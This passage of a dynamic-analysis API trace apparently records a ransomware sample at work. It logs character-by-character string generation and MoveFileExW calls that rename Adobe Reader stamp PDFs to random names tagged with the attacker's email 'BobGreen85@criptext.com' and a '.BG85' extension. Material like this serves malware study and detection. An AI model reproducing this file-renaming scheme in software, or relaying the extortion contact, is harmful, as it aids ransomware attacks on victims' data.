cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.096] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.096] GetTickCount () returned 0x114bac8 [0078.096] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19843535165) returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.097] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\[BobGreen85@criptext.com].5SmetcSd-jlaiWBld.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\[bobgreen85@criptext.com].5smetcsd-jlaiwbld.bg85"), dwFlags=0x1) returned 1 [0078.098] GetTickCount () returned 0x114bac8 [0078.098] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19843714446) returned 1 [0078.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0078.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0078.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0078.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0078.099] GetTickCount () returned 0x114bac8 [0078.099] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19843785063) returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0078.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0078.100] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\[BobGreen85@criptext.com].v6e0zW3r-YHR8NEER.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\[bobgreen85@criptext.com].v6e0zw3r-yhr8neer.bg85"), dwFlags=0x1) returned 1 [0078.101] GetTickCount () returned 0x114bac8 [0078.101] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19843968919) returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0078.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0078.101] GetTickCount () returned 0x114bac8 [0078.101] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19844044256) returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0078.102] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\[BobGreen85@criptext.com].uND7BLVk-9ZEG3avc.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\[bobgreen85@criptext.com].und7blvk-9zeg3avc.bg85"), dwFlags=0x1) returned 1 [0078.105] GetTickCount () returned 0x114bac8 [0078.105] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19844354587) returned 1 [0078.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0078.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0078.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0078.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.110] GetTickCount () returned 0x114bad7 [0078.110] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19844924999) returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0078.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0078.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0078.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\[BobGreen85@criptext.com].V4fvmN3c-ZwViU08N.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\[bobgreen85@criptext.com].v4fvmn3c-zwviu08n.bg85"), dwFlags=0x1) returned 1 [0078.112] GetTickCount () returned 0x114bad7 [0078.112] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19845056882) returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0078.112] GetTickCount () returned 0x114bad7 [0078.112] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19845115907) returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0078.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\[BobGreen85@criptext.com].fzWDGcpY-m0cKGDKd.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\[bobgreen85@criptext.com].fzwdgcpy-m0ckgdkd.bg85"), dwFlags=0x1) returned 1 [0078.189] GetTickCount () returned 0x114bb25 [0078.189] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19852778445) returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.189] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0078.189] GetTickCount () returned 0x114bb25 [0078.189] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19852836861) returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0078.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\[BobGreen85@criptext.com].7jLgqDd5-zSnwt6hi.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\[bobgreen85@criptext.com].7jlgqdd5-zsnwt6hi.bg85"), dwFlags=0x1) returned 1 [0078.191] GetTickCount () returned 0x114bb25 [0078.191] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19852969760) returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.191] GetTickCount () returned 0x114bb25 [0078.191] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19853019250) returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 